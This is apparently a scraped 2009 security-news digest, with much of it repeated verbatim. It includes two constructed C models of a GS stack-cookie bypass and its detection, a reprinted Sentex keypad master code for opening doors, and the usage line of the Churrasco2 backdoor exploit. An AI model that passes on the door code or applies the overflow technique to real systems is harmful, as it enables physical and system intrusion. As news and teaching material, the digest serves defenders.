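 * and terminate), 0 if the frame looked intact. check_early models a
 * hypothetical check placed before the first use of a local; real GS checks
 * only at return. */
int vulnerable(const unsigned char *data, size_t len, int check_early)
{
    struct frame f;
    f.cb = benign_cb;
    f.cookie = SECURITY_COOKIE;
    if (len > sizeof f) len = sizeof f;        /* keep the demo within the object */
    memcpy(&f, data, len);                     /* the bug: len is attacker controlled, buf is 16 bytes */

    if (check_early && f.cookie != SECURITY_COOKIE)
        return 1;                              /* overrun caught before cb is used */

    f.cb();                                    /* control transfer before the epilogue */

    if (f.cookie != SECURITY_COOKIE)
        return 1;                              /* the real GS check: too late if cb was hijacked */
    return 0;
}

/* Builds the constructed attacker input: fills buf, overwrites cb with the
 * gadget address (assumes the attacker knows it) and the cookie with a guess
 * that will be wrong. Returns the payload length. */
size_t build_payload(unsigned char *out, size_t cap)
{
    struct frame evil;
    memset(&evil, 0, sizeof evil);
    memset(evil.buf, 'A', sizeof evil.buf);
    evil.cb = attacker_gadget;
    evil.cookie = 0x41414141u;
    if (cap < sizeof evil) return 0;
    memcpy(out, &evil, sizeof evil);
    return sizeof evil;
}

/* Runs one scenario and packs the outcome:
 * bit 1 = cookie check fired, bit 0 = attacker gadget executed. */
int run_scenario(int check_early)
{
    unsigned char payload[sizeof(struct frame)];
    size_t n = build_payload(payload, sizeof payload);
    gadget_ran = 0;
    int detected = vulnerable(payload, n, check_early);
    return detected * 2 + gadget_ran;
}

int main(void)
{
    printf("GS-style check at return only: %d (3 = detected, but gadget already ran)\n", run_scenario(0));
    printf("check before first use:        %d (2 = detected, gadget never ran)\n", run_scenario(1));
    return 0;
}
```

The point of the two scenarios is that GS does detect the corruption in both; what differs is whether detection happens before or after the attacker's code has executed. Anything reachable between the overrun and the epilogue (a function pointer, a C++ object pointer, an exception handler record) is outside the cookie's protection, which is why the post treats GS as an obstacle rather than a guarantee.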
----------
Posted at 10:00 AM ET, 03/17/2009
Newsflash: Local Man Launches Virus Epidemic
Malware authors are beginning to personalize virus attacks sent through e-mail, blasting out fake news alerts about shocking events that supposedly happened in or around the recipient's home town.
This latest innovation comes compliments of the Waledac worm, widely seen as the successor to the Storm worm, a wily virus that used a seemingly bottomless bag of new tricks to fool people into clicking on links that launch the worm into action.
On Monday, security firm Trend Micro began warning people to look out for bogus "Reuters breaking news" e-mails warning of explosion or other various calamities that have supposedly broken out in a city near you. The message content pulls data from so-called "geo-location" services that can use the recipient's Internet address to make a semi-accurate guess of their nearest town.
For example, a user who lives in Fairfax, Va., might see this subject line in a missive sent by Waledac: "Powerful explosion burst in Fairfax this morning." The message authors also append a Wikipedia link and a Google search link at the bottom to add to the fake alert's legitimacy.
Trend and other security firms first spotted this localization technique used by another Waledac variant last month, which used e-mails claiming to help recipients weather the financial crisis by linking to fake coupons for retail stores in the recipient's area.
Posted by Brian Krebs
----------
17 March 2009
More information on Microsoft's DNS and WINS patches
Last week's patch for Microsoft's DNS and WINS servers immunises clean systems, but does not clean up already affected systems.
Microsoft has responded to criticism that the fixes for DNS and WINS released last Patch Tuesday as MS09-008 were ineffective. One security researcher complained that already inserted WPAD (Web Proxy Auto Discovery) entries were not removed or blocked. In a blog entry, MSRC Program Manager Maarten Van Horenbeeck said that this was intentional, as Microsoft only creates security updates to protect a system against future attacks and does not aim to undo any attack "that has taken place in the past".
He then goes on to show how WPAD entries can be verified using the MMC DNS snap-in. Microsoft's expert also expands on the background to the other vulnerabilities that the patch fixes.
----------
Cisco's data center plans: Winners, losers
Larry Dignan: Cisco rolled out its long-awaited vision of data center architecture, including multiple partners, a wire-once approach to link computing, virtualization, storage and networking and a call to lower costs.
Cisco: 'We're going to compete with HP'
What Cisco learned from open source
Gallery: Cisco's blade servers
----------
Year-old Windows hole under attack
Ryan Naraine: Exactly one year after a security researcher notified Microsoft of a serious security vulnerability affecting all supported versions of Windows (including Vista and Windows Server 2008), the issue remains unpatched and now comes word that there are in-the-wild exploits circulating.
The vulnerability, called token kidnapping (.pdf), was originally discussed last March by researcher Cesar Cerrudo and led to Microsoft issuing an advisory with workarounds. Five months later (October 2008), Cerrudo released a proof-of-concept in an apparent effort to nudge Microsoft into patching but the company has not yet released a fix.
...
----------
That article included these lines:
It should also be said that the list of outstanding Windows flaws collecting dust is very long and continues to grow everyday.
In the absence of a patch, end users should pay attention to the workarounds/mitigations in Microsoft’s advisory.
----------
Some items from that article:
The missing WMP patch is just one of a several known — and very serious — vulnerabilities that have not yet been patched by Microsoft. A few off the top of my head:
Internet Explorer – Remember the Safari-to-IE blended threat from April? This vulnerability was reported to Microsoft since 2006 and, despite issuing an advisory that embarrassed Apple into shipping a Safari fix, Microsoft has still not fixed the underlying code defect. Now, I’m hearing murmurings that this issue probably won’t be fixed until Windows 7. Boo!
Token Kidnapping — Four months after shipping a pre-patch advisory confirming the severity of Cesar Cerrudo’s token kidnapping (.pdf) bug, Microsoft’s fix is still not available. This issue affects Windows XP Professional Service Pack 2 and all supported versions and editions of Windows Server 2003, Windows Vista, and Windows Server 2008.
Ghosts in Browsers — It’s been more than three months since Manuel Caballero (now a Microsoft employee) went to Blue Hat and gave the scary ghosts-in-the-browser talk. Nate McFeters saw the carnage first hand and confirms that it affects “all browsers.” Since then, Sirdarckcat published details on IE browser flaws that extend to both IE 7 and IE 8 beta. Worse, they’re all still unpatched.
Web Proxy Auto-Discovery — This man-in-the-middle WPAD issue, publicly discussed at Kiwicon last December, is another bug on Microsoft’s late list. An advisory with mitigations (Windows 2000, Windows XP, Windows Server 2003 and Windows Vista) is available but still no patch. This issue also relates to all versions of Internet Explorer, including IE 7 for Windows Vista so it’s not insignificant.
Print Table of Links (IE) - Aviv Raff’s discovery of a cross-zone issue affecting IE 7 and IE 8 beta is publicly known but, despite the availability of proof-of-concept code, there’s no fix yet from Microsoft.
If that list is not scary enough, take a peek at this upcoming advisories page maintained by TippingPoint’s Zero Day Initiative. It lists a whopping 20 unpatched vulnerabilities that have been reported to Microsoft, some more than 200 days ago.
----------
Patch Those Internet Printers
When I wrote a scanner plug-in this week for an old directory traversal vulnerability, CVE-2008-4419, I wondered whether there are vulnerable HP LaserJet printers online that can be controlled from the Internet. To find out, I used Google. The search listed almost 50 results, and I found that almost all of these printers are not patched, even though HP has provided firmware updates to resolve this vulnerability. An attacker could leverage this Unicode-encoded directory traversal vulnerability to read configuration files or cached documents, and gain read access from the Internet to important internal information.
Usually administrators ignore the security of printer devices. They may think there is no harm even if the printer can be controlled remotely by an attacker.
The administration web interface of these LaserJets can be accessed without passwords. The attacker can use these LaserJets to print any documents from anywhere. Although attackers may not be able to reach the printouts, at least they can waste a lot of paper. Spammers can also post free advertising to companies if they connect to these printers.
So please harden your network gateway or firewall to restrict access to these devices. Don’t give everyone on the Internet a chance to use your printer, and patch the vulnerable LaserJets to prevent the potential information disclosure.
To download the HP firmware updates and upgrade instructions, click here.
----------
... The downsizing has been added to the Layoff Tracker, which has tracked over 300,000 layoffs since last year.
Total Layoffs Since August 27, 2008: 441
Total Employees: 310,718
----------
IT contractor indicted for sabotaging offshore rig management system
March 18, 2009 (Computerworld) An IT contract employee who formerly worked at an oil and gas production company in Long Beach, Calif., was indicted yesterday on charges of sabotaging a computer system he helped set up because the company did not offer him a permanent job.
The case is the latest to highlight the challenge that businesses face in trying to protect corporate systems and networks from rogue insiders and those with privileged access to systems, such as contractors and business partners. Security analysts have warned about the heightened threats such users pose to corporations because of the broader disgruntlement resulting from layoffs and other belt-tightening steps companies have taken during the recession.
----------
Vivek Kundra reinstated as federal CIO
March 17, 2009 (Computerworld) Vivek Kundra, who took a leave of absence from his job as the federal government's first CIO last week, was reinstated today after the White House determined that he has no connection to an alleged bribery scheme in the District of Columbia's IT department, where he previously was chief technology officer.
"Mr. Kundra has been informed that he is neither a subject nor a target of the investigation and has been reinstated," White House spokesman Nick Shapiro said via e-mail late today, in response to a query seeking confirmation of reports posted online by the Personal Democracy Forum's techPresident blog and The New York Times.
Kundra had been on leave since last Thursday, following the arrests of the D.C. IT department's acting chief security officer and the CEO of an outsourcing contractor on bribery and other charges. The arrests and a related raid on the district's IT offices took place as Kundra was speaking at FOSE 2009, a government IT conference in Washington, in his first major public appearance since being named federal CIO.
...
----------
Blogger who streamed pre-release Guns N' Roses songs deserves prison time, say feds
----------
D.C. IT bribery suspect to remain in jail; judge says evidence 'overwhelming'
----------
Criminals sneak card-sniffing software on Diebold ATMs
March 17, 2009 (IDG News Service) Diebold Inc. has released a security fix for its Opteva automated teller machines after cybercriminals apparently broke into the systems at one or more businesses in Russia and installed malicious software.
Diebold learned of the incident in January and sent out a global security update to its ATM customers using the Windows operating system. It is not releasing full details of what happened, including which businesses were affected, but said criminals had gained physical access to the machines to install their malicious program.
"Criminals gained physical access to the inside of the affected ATMs," Diebold said in its security update. "This criminal activity resulted in the operation of unauthorized software and devices on the ATMs, which was used to intercept sensitive information."
----------
Consumer Groups Launch Badware-busting Community PC World - Tue Mar 17, 12:50 PM ET
The people behind StopBadware.org have launched a Web site where ordinary people can band together to fight computer viruses and adware.
----------
Social Networks' Risks for Business Security
Corporate social media has many positives, but security issues should not be overlooked.
----------
Adobe Security Bulletin Adobe Reader and Acrobat
Adobe has released security advisory APSB09-04 for Adobe Reader and Acrobat. The CVE entries related to the vulnerabilities being patched are CVE-2009-0658 and CVE-2009-0927. Current versions are now 9.1, 8.1.4, and 7.11. Updates for both Windows and Macintosh platforms are available.
----------
NSA Director: We Don't Want to Run Cybersecurity
CSO Publisher Bob Bragdon moderates the IT Security Entrepreneur's Forum at Stanford University and blogs about the keynote speech from NSA Director and Lt. Gen. Keith Alexander.
----------
GS cookie protection – effectiveness and limitations
Monday, March 16, 2009 4:15 PM
MSRC Engineering
The Microsoft C/C++ compiler supports the GS switch which aims to detect stack buffer overruns at runtime and terminate the process, thus in most cases preventing an attacker from gaining control of the vulnerable machine. This post will not go into detail about how GS works, so it may be helpful to refer to these MSDN articles for an overview and loads of detail on how GS works and what a GS cookie is. It’s important to note that depending on the exact vulnerability, even if a function is protected by a GS cookie, a stack-based buffer overrun may still be exploitable – for example if the attacker can gain control prior to the cookie check. However even in these circumstances, GS can often be a significant obstacle to exploitation and/or reliability of exploitation. There have been some stack-based attacks recently that were not mitigated by GS – this post takes a couple of examples and looks at why that was.
...
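To make the mechanism the MSRC post describes concrete, here is a constructed C model of a /GS-protected frame (an added example, not code from the post or from Microsoft; BUF_SIZE, the seed and the cookie-mixing routine are assumptions): the prologue stores an XORed copy of the process cookie above the buffer, an unchecked memcpy overruns it, and the epilogue check catches the corruption. It also shows the limitation the post mentions: nothing that happens before the epilogue check is verified.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of an MSVC /GS-protected frame (added example, not code
 * from the MSRC post). /GS places a process-wide secret, __security_cookie,
 * between the local buffers and the saved return address, and the epilogue
 * calls __security_check_cookie before returning. This model reproduces the
 * layout and the check in portable C so the detection can be observed. */

#define BUF_SIZE   16
#define FRAME_SIZE (BUF_SIZE + sizeof(uintptr_t))   /* [buffer][cookie] */

static uintptr_t g_security_cookie;   /* stands in for __security_cookie */

/* MSVC seeds the cookie at process start from tick counts, the process and
 * thread ids and the performance counter. Here a caller-supplied seed is
 * mixed with a constructed splitmix-style scrambler (an assumption, not
 * MSVC's routine) so the value is not readable off the seed by inspection. */
void init_security_cookie(uint64_t seed)
{
    uint64_t x = seed + 0x9E3779B97F4A7C15ULL;
    x = (x ^ (x >> 30)) * 0xBF58476D1CE4E5B9ULL;
    x = (x ^ (x >> 27)) * 0x94D049BB133111EBULL;
    x ^= x >> 31;
    g_security_cookie = (uintptr_t)x;
    if (g_security_cookie == 0)            /* a zero cookie must never be used */
        g_security_cookie = (uintptr_t)0xA5A5C3C3u;   /* constructed fallback */
}

/* A function with an unchecked copy into a fixed stack buffer, laid out as
 * /GS would lay it out. Returns 1 if the cookie is intact at the epilogue,
 * 0 if the overrun clobbered it (the real check would call
 * __report_gsfailure and terminate the process instead of returning). */
int gs_protected_copy(const unsigned char *src, size_t len)
{
    unsigned char frame[FRAME_SIZE];
    uintptr_t expected, stored;

    /* Prologue: the cookie is XORed with the frame address (MSVC uses the
     * frame or stack pointer), so one leaked frame cookie does not directly
     * reveal the process-wide value. */
    expected = g_security_cookie ^ (uintptr_t)frame;
    memcpy(frame + BUF_SIZE, &expected, sizeof expected);

    /* The defect: len is never compared with BUF_SIZE. The cap at FRAME_SIZE
     * only keeps this model within defined behaviour; a real overrun would
     * continue past the cookie into the saved return address. */
    if (len > FRAME_SIZE)
        len = FRAME_SIZE;
    memcpy(frame, src, len);

    /* Epilogue: __security_check_cookie. Nothing before this point is
     * checked; that is the window the post refers to when an attacker can
     * gain control prior to the cookie check. */
    memcpy(&stored, frame + BUF_SIZE, sizeof stored);
    return stored == expected;
}

/* Run one scenario: copy copy_len bytes of 0x41 (constructed input) into the
 * protected frame and report whether the cookie survived. */
int run_scenario(size_t copy_len)
{
    unsigned char input[64];

    if (g_security_cookie == 0)
        init_security_cookie(0x5EEDu);     /* constructed seed */
    if (copy_len > sizeof input)
        copy_len = sizeof input;
    memset(input, 0x41, sizeof input);
    return gs_protected_copy(input, copy_len);
}

int main(void)
{
    printf("%zu bytes (fits)          -> cookie intact: %d\n",
           (size_t)BUF_SIZE, run_scenario(BUF_SIZE));
    printf("%zu bytes (full overrun)  -> cookie intact: %d\n",
           (size_t)FRAME_SIZE + 8, run_scenario(FRAME_SIZE + 8));
    /* A one-byte overrun is caught unless the clobbered cookie byte already
     * held 0x41, so a single-byte overwrite slips past about 1 time in 256. */
    printf("%zu bytes (one past end)  -> cookie intact: %d\n",
           (size_t)BUF_SIZE + 1, run_scenario(BUF_SIZE + 1));
    return 0;
}
```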
----------
Posted at 10:00 AM ET, 03/17/2009
Newsflash: Local Man Launches Virus Epidemic
Malware authors are beginning to personalize virus attacks sent through e-mail, blasting out fake news alerts about shocking events that supposedly happened in or around the recipient's home town.
This latest innovation comes compliments of the Waledac worm, widely seen as the successor to the Storm worm, a wily virus that used a seemingly bottomless bag of new tricks to fool people into clicking on links that launch the worm into action.
On Monday, security firm Trend Micro began warning people to look out for bogus "Reuters breaking news" e-mails warning of explosion or other various calamities that have supposedly broken out in a city near you. The message content pulls data from so-called "geo-location" services that can use the recipient's Internet address to make a semi-accurate guess of their nearest town.
For example, a user who lives in Fairfax, Va., might see this subject line in a missive sent by Waledac: "Powerful explosion burst in Fairfax this morning." The message authors also append a Wikipedia link and a Google search link at the bottom to add to the fake alert's legitimacy.
Trend and other security firms first spotted this localization technique used by another Waledac variant last month, which used e-mails claiming to help recipients weather the financial crisis by linking to fake coupons for retail stores in the recipient's area.
Posted by Brian Krebs
----------
17 March 2009
More information on Microsoft's DNS and WINS patches
Last week's patch for Microsoft's DNS and WINS servers immunises clean systems, but does not clean up already affected systems.
Microsoft has responded to criticism that the fixes for DNS and WINS released last Patch Tuesday as MS09-008 were ineffective. One security researcher complained that already inserted WPAD (Web Proxy Auto Discovery) entries were not removed or blocked. In a blog entry, MSRC Program Manager Maarten Van Horenbeeck said that this was intentional, as Microsoft only creates security updates to protect a system against future attacks and does not aim to undo any attack "that has taken place in the past".
He then goes on to show how WPAD entries can be verified using the MMC DNS snap-in. Microsoft's expert also expands on the background to the other vulnerabilities that the patch fixes.
----------
Cisco's data center plans: Winners, losers
Larry Dignan: Cisco rolled out its long-awaited vision of data center architecture, including multiple partners, a wire-once approach to link computing, virtualization, storage and networking and a call to lower costs.
Cisco: 'We're going to compete with HP'
What Cisco learned from open source
Gallery: Cisco's blade servers
----------
Friday, March 13, 2009
Friday 03/13/09
Conficker/Downadup Evolves To Defend Itself
Mar 12, 2009
Worm develops ability to disable antimalware tools, switch domains more frequently
----------
Major Cybercrime Busts Take Place In Romania
----------
Government Needs To Get Its Cybersecurity In Gear, Experts Tell Congress
Mar 10, 2009
Security industry leaders agree that White House should lead revamped cybersecurity effort
----------
When web application security, Microsoft and the AV vendors all fail
I just spent some time analyzing yet another incident and I was actually shocked about how the combination of relatively weak defenses led to a system being completely compromised. The three main actors in this movie were a web application with a security vulnerability, Microsoft’s server class operating systems with an unpatched local privilege escalation vulnerability and the last line of everyone’s defense, the AV vendors.
The story started more or less like hundreds of recently seen incidents. A web application had a vulnerability that allowed a remote attacker to upload files to the server. As the files were not validated, the attacker was able to upload a .NET Webshell. This webshell is known as ASPXSpy, it’s an ASPX program that allows easy control over the compromised server. The attacker can now upload files through the browser and execute them.
However, the attacker still does not have total control over the server as the IIS service runs under an unprivileged account. This is where the local privilege escalation vulnerability comes into play. The attackers uploaded a local exploit called Churrasco2. This is a PoC created by a well-known researcher, Cesar Cerrudo, and published back in October 2008. What makes it even worse is that it works on both Windows Server 2008 and Server 2003. The exploit creates a backdoor shell after it steals the SYSTEM token. The program’s usage description says it all:
/Churrasco/-->Usage: Churrasco2.exe ipaddress port
After this, it was game over. The attacker had a backdoor to the server running as SYSTEM. The next steps were very obvious and included installation of another Trojan as well as a keylogger.
Finally, the last line of defense, the anti-virus program, failed as well. Although the AV vendors typically include detection for exploits, it’s clear that they missed this one. I ran it past VirusTotal and the results were … well … horrible is an understatement – 0 AV programs detected this: http://www.virustotal.com/analisis/4f48b73697428888f338bf66fa1eb92a
So, what can we learn from this example? The attacks I described are in the wild and are abused. The first line of defense, in this case the web application’s security, must be made as secure as possible – secure coding standards, penetration tests and whatever else you can do are justified. As we saw from this example, other defenses failed. And the security of your web application depends only on you.
This doesn’t mean that the other two actors should just sit and do nothing. Microsoft should really fix this vulnerability and pay more attention to local privilege escalation vulnerabilities. While MS released an advisory with suggested workarounds (available at http://www.microsoft.com/technet/security/advisory/951306.mspx), I don’t think enough people know about this.
Finally, the AV vendors should be more proactive (instead of reactive) and follow exploit research developments so they can add detection for similar exploits early and protect their customers.
----------
Massive ARP spoofing attacks on web sites
----------
Russian youth organization cops to 2007 Estonian cyberattacks
Nearly two years after Estonian government sites were brought to their knees by a DDoS attack, a high-ranking official over the Russian youth group Nashi has admitted that his organization was behind the attacks. Nashi maintains that it acted without authorization from the government, but will the Russians move to punish those responsible in a tense political situation?
----------
The March 2009 release contains 3 new bulletins, 1 of which has a maximum severity of "Critical".
MS09-006 - Vulnerabilities in Windows Kernel Could Allow Remote Code Execution (958690)
MS09-007 - Vulnerability in SChannel Could Allow Spoofing (960225)
MS09-008 - Vulnerabilities in DNS and WINS Server Could Allow Spoofing (962238)
We also revised bulletin MS08-052 Vulnerabilities in GDI+ Could Allow Remote Code Execution (954593), to note a revision to some of the packages associated with this bulletin (specifically 938464).
----------
Hacking iTunes Gift Cards, and an iTunes Update
Recently, several media outlets have been running a fascinating story about hackers making oodles of money selling iTunes gift cards activation codes at online auctions, supposedly after cracking the secret algorithm Apple uses to generate voucher codes for iTunes gift cards.
But a blog post published today by one of the security industry's most prominent researchers suggests that the real hack here is far simpler: The crooks are merely using stolen credit cards to purchase and resell the iTunes gift cards.
----------
The Doghouse: Sentex Keypads
It has a master key:
Here's a fun little tip: You can open most Sentex key pad-access doors by typing in the following code:
***00000099#*
The first *** are to enter into the admin mode, 000000 (six zeroes) is the factory-default password, 99# opens the door, and * exits the admin mode (make sure you press this or the access box will be left in admin mode!)
----------
Former FBI Director calls for decentralisation of cybersecurity responsibilities
Former FBI director Louis Freeh warns that security problems on networks are too complex for the National Security Agency (NSA) alone to resolve.
----------
"The French national police force, the Gendarmerie Nationale, has spoken about their migration away from the Windows platform to Linux. Estimated to have already saved the force 50 Million Euros, the migration is due to be completed on all 90,000 workstations by 2015. Of the move, Lt. Col. Guimard had this comment: 'Moving from Microsoft XP to Vista would not have brought us many advantages and Microsoft said it would require training of users. Moving from XP to Ubuntu, however, proved very easy. The two biggest differences are the icons and the games. Games are not our priority.'"
----------
BBC buys a botnet, DDoSes security firm
Dancho Danchev: A team at the BBC's Click purchases a botnet of 22,000 malware-infected PCs, self-spams themselves on a Gmail account, then DDoS-es security company Prevx. Is this any way to fight cybercrime?
----------
Be Careful What You Search For
March 11, 2009
Several Search Engine Optimization schemes are being used to attract search engine users to fake anti-virus web sites.
----------
CLIENT ALERT:
Musicians Lobbying For Approval Of Ticketmaster-Live Nation Merger Forget To Mention Massive Conflict Of Interest
----------
Visa: Heartland, RBS WorldPay no longer PCI compliant
Dan Kaplan March 13, 2009
Visa has removed Heartland Payment Systems and RBS WorldPay -- two payment processors that have announced massive data breaches in recent months -- from its list of service providers compliant with payment industry guidelines.
----------
Web malware, more advanced and targeted than ever
Dan Kaplan March 12, 2009
The prevalence of web-based malware massively rose last year -- and the state of the economy is likely a big reason, according to an annual threat report from ScanSafe.
----------
Spot the Tiny Phishing Trick
Phishers are abusing the useful TinyURL service to hide phishing links. Here's how to spot the ruse.
----------
Apple Security Update Fixes ITunes Vulnerabilities
Update fixes a pair of security concerns, and adds support for its new line of iPod shuffles.
----------
D.C.'s top IT security official charged with bribery
Federal law enforcement officials filed bribery charges today against the District of Columbia's acting chief security officer, along with a one-time D.C. government employee who owns an IT outsourcing company that runs offshore operations in India. Both were later arraigned in federal court.
----------
The three astronauts on board the International Space Station today were forced to seek shelter in a "lifeboat" when space debris came hurtling dangerously close to the orbiting outpost.
Two American astronauts and a Russian cosmonaut took refuge in the Soyuz TMA-13 Capsule, which is what they would use if they needed to return to Earth, according to Josh Byerly, a NASA spokesman. They were in the capsule from 12:34 a.m. to 12:45 a.m. Eastern time today when they received an all-clear from Mission Control.
Mar 12,2009
Worm develops ability to disable antimalware tools, switch domains more frequently
----------
Major Cybercrime Busts Take Place In Romania
----------
Government Needs To Get Its Cybersecurity In Gear, Experts Tell Congress
Mar 10,2009
Security industry leaders agree that White House should lead revamped cybersecurity effort
----------
When web application security, Microsoft and the AV vendors all fail
I just spent some time analyzing yet another incident and I was actually shocked about how the combination of relatively weak defenses led to a system being completely compromised.The three main actors in this movie were a web application with a security vulnerability, Microsoft’s server class operating systems with an unpatched local privilege escalation vulnerability and the last line of everyone’s defense, the AV vendors.
The story started more or less like hundreds of recently seen incidents. A web application had a vulnerability that allowed a remote attacker to upload files to the server. As the files were not validated, the attacker was able to upload a .NET Webshell. This webshell is known as ASPXSpy, it’s an ASPX program that allows easy control over the compromised server. The attacker can now upload files through the browser and execute them.
However, the attacker still does not have total control over the server as the IIS service runs under an unprivileged account. This is where the local privilege escalation vulnerability comes into play. The attackers uploaded a local exploit called Churrasco2. This is a PoC created by a well known researcher Cesar Cerrudo and published back in October 2008. What makes it even worse is that it work on both Windows Server 2008 and Server 2003. The exploit creates a backdoor shell after it steals the SYSTEM token. The program’s usage description says it all:
/Churrasco/-->Usage: Churrasco2.exe ipaddress port
After this, it was game over. The attacker had a backdoor to the server running as SYSTEM. The next steps were very obvious and included installation of another Trojan as well as a keylogger.
Finally, the last line of defense, the anti-virus program, failed as well. Although the AV vendors typically include detection for exploits, it’s clear that they missed this one. I ran it past VirusTotal and the results where … well … horrible is an understatement – 0 AV programs detected this: http://www.virustotal.com/analisis/4f48b73697428888f338bf66fa1eb92a
So, what can we learn from this example? The attacks I described are in the wild and are abused. The first line of defense, in this case the web application’s security, must be made as secure as possible – secure coding standards, penetration tests and whatever else you can do are justified. As we saw from this example, other defenses failed. And the security of your web application depends only on you.
This doesn’t mean that other two actors should just sit and do nothing. Microsoft should really fix this vulnerability and pay more attention to local privilege escalation vulnerabilities. While MS released an advisory with suggested workarounds (available at http://www.microsoft.com/technet/security/advisory/951306.mspx), I don’t think enough people know about this.
Finally, the AV vendors should be more proactive (instead of reactive) and follow exploit research developments so they can add detection for similar exploits early and protect their customers.
----------
Massive ARP spoofing attacks on web sites
----------
Russian youth organization cops to 2007 Estonian cyberattacks
Nearly two years after Estonian government sites were brought to their knees by a DDoS attack, a high-ranking official over the Russian youth group Nashi has admitted that his organization was behind the attacks. Nashi maintains that it acted without authorization from the government, but will the Russians move to punish those responsible in a tense political situation?
----------
The March 2009 release contains 3 new bulletins, 1 of which has a maximum severity of "Critical".
MS09-006 - Vulnerabilities in Windows Kernel Could Allow Remote Code Execution (958690)
MS09-007 - Vulnerability in SChannel Could Allow Spoofing (960225)
MS09-008 - Vulnerabilities in DNS and WINS Server Could Allow Spoofing (962238)
We also revised bulletin MS08-052 Vulnerabilities in GDI+ Could Allow Remote Code Execution (954593), to note a revision to some of the packages associated with this bulletin (specifically 938464).
----------
Hacking iTunes Gift Cards, and an iTunes Update
Recently, several media outlets have been running a fascinating story about hackers making oodles of money selling iTunes gift cards activation codes at online auctions, supposedly after cracking the secret algorithm Apple uses to generate voucher codes for iTunes gift cards.
But a blog post published today by one of the security industry's most prominent researchers suggests that the real hack here is far simpler: The crooks are merely using stolen credit cards to purchase and resell the iTunes gift cards.
Permalink
----------
The Doghouse: Sentex Keypads
It has a master key:
Here's a fun little tip: You can open most Sentex key pad-access doors by typing in the following code:
***00000099#*
The first *** are to enter into the admin mode, 000000 (six zeroes) is the factory-default password, 99# opens the door, and * exits the admin mode (make sure you press this or the access box will be left in admin mode!)
----------
Former FBI Director calls for decentralisation of cybersecurity responsibilities
Former FBI director, Louis Freeh warns that security problems on networks are too complex for the National Security Agency (NSA) alone, to resolve more…
----------
"The French national police force, the Gendarmerie Nationale, has spoken about their migration away from the Windows platform to Linux. Estimated to have already saved the force 50 Million Euros, the migration is due to be completed on all 90,000 workstations by 2015. Of the move, Lt. Col. Guimard had this comment: '"Moving from Microsoft XP to Vista would not have brought us many advantages and Microsoft said it would require training of users. Moving from XP to Ubuntu, however, proved very easy. The two biggest differences are the icons and the games. Games are not our priority."'"
Read More...
----------
BBC buys a botnet, DDoSes security firm
Dancho Danchev: A team at the BBC's Click purchases a botnet of 22,000 malware-infected PCs, self-spams themselves on a Gmail account, then DDoS-es security company Prevx. Is this anyway to fight cybercrime?
----------
Be Careful What You Search For
March 11, 2009
Several Search Engine Optimization schemes are being used to attract search engine users to fake anti-virus web sites.
----------
CLIENT ALERT:
Musicians Lobbying For Approval Of Ticketmaster-Live Nation Merger Forget To Mention Massive Conflict Of Interest
----------
Visa: Heartland, RBS WorldPay no longer PCI compliant
Dan Kaplan March 13, 2009
Visa has removed Heartland Payment Systems and RBS WorldPay -- two payment processors that have announced massive data breaches in recent months -- from its list of service providers compliant with payment industry guidelines.
----------
Web malware, more advanced and targeted than ever
Dan Kaplan March 12, 2009
The prevalence of web-based malware rose massively last year, and the state of the economy is likely a big reason, according to an annual threat report from ScanSafe.
----------
Spot the Tiny Phishing Trick
Phishers are abusing the useful TinyURL service to hide phishing links. Here's how to spot the ruse.
----------
Apple Security Update Fixes ITunes Vulnerabilities
The update fixes a pair of security concerns and adds support for Apple's new line of iPod shuffles.
----------
D.C.'s top IT security official charged with bribery
Federal law enforcement officials filed bribery charges today against the District of Columbia's acting chief security officer, along with a one-time D.C. government employee who owns an IT outsourcing company that runs offshore operations in India. Both were later arraigned in federal court.
----------
The three astronauts on board the International Space Station today were forced to seek shelter in a "lifeboat" when space debris came hurtling dangerously close to the orbiting outpost.
Two American astronauts and a Russian cosmonaut took refuge in the Soyuz TMA-13 Capsule, which is what they would use if they needed to return to Earth, according to Josh Byerly, a NASA spokesman. They were in the capsule from 12:34 a.m. to 12:45 a.m. Eastern time today when they received an all-clear from Mission Control.
Monday, March 9, 2009
Monday 03/09/09
California bill spells out what companies have to say about data breaches
A co-author of California's landmark data-breach notification law has introduced a new bill that would set specific requirements on what companies have to say in breach notices.
----------
Charges beefed up against alleged Sarah Palin e-mail hacker
The University of Tennessee college student accused of illegally accessing Alaska Gov. Sarah Palin's Yahoo e-mail account was formally charged today on new fraud and obstruction-of-justice charges.
David Kernell was arraigned in U.S. District Court for the Eastern District of Tennessee, five months after a federal grand jury first handed down charges against him. He had been facing just one count of illegally accessing a protected computer, but prosecutors are now accusing him of three counts of computer fraud and one count of obstruction of justice. All four charges are felonies.
Kernell pleaded not guilty to the charges, according to court records.
----------
No more CeBIT police raids: European, Chinese companies talk on tech licensing
----------
Excel Bug Will Be Ignored on Patch Tuesday
... The company acknowledged, however, that it will not deliver a fix for an Excel flaw that attackers are now exploiting.
Microsoft didn't disclose details of the patches, other than to say which versions of Windows will be affected.
----------
Visa Backtracks on Breach Disclosure
Visa and MasterCard have probably been slow to identify the cause of a breach that they warned banks about in mid-February because they want to complete an investigation into the incident, analysts say.
However, the lack of candor sparked rampant speculation that a new, major breach had occurred, forcing Visa to later say that the warning referred to an expanded investigation of a previously known incident.
----------
Hackers update Conficker worm, evade countermeasures
The Conficker/Downadup worm managed to slither onto millions of PCs worldwide at its height, but after it initially infected a computer it only really acted to spread itself, and didn't cause further harm. Until now.
----------
Federal cybersecurity director quits, complains of NSA role
Cybersecurity chief Beckstrom resigns
Reuters - Fri Mar 6, 11:46 PM ET
NEW YORK (Reuters) - The U.S. government's director for cybersecurity resigned on Friday, criticizing the excessive role of the National Security Agency in countering threats to the country's computer systems.
----------
Google Docs Glitch Exposes Private Files
Only a few users were affected, and the problem appears to be solved.
----------
Build Security into Every Product, Coders Advised
Security experts suggest security should be "baked into" every software development project.
----------
Behind the Estonia Cyber Attacks
Radio Free Europe / Radio Liberty ran a story on Friday that we just discovered. According to the article, a Russian official has admitted that Russia was responsible for the cyber attacks on Estonia in April/May 2007. We don't have any other data to correlate this with, so we ask our readers if you know of any other independent reporting of this please let us know via our contact form.
If this story is true, it adds yet another twist to the "truth" of what happened in Estonia in 2007 and perhaps also with respect to the alleged Russian cyber attacks against Georgia last year. There is no internationally accepted formal definition of "cyber warfare" even though many in the media like to use that term freely when describing denial of service attacks, website defacements, or other activities that otherwise would be labeled as criminal behavior. I don't personally believe that any hostile activity we have seen so far in cyberspace can be labeled "warfare" but rather is either criminal or espionage related.
----------
Hypocrisy or necessity? RIAA continues filing lawsuits
----------
Swindlers using new CSS method to attack eBay
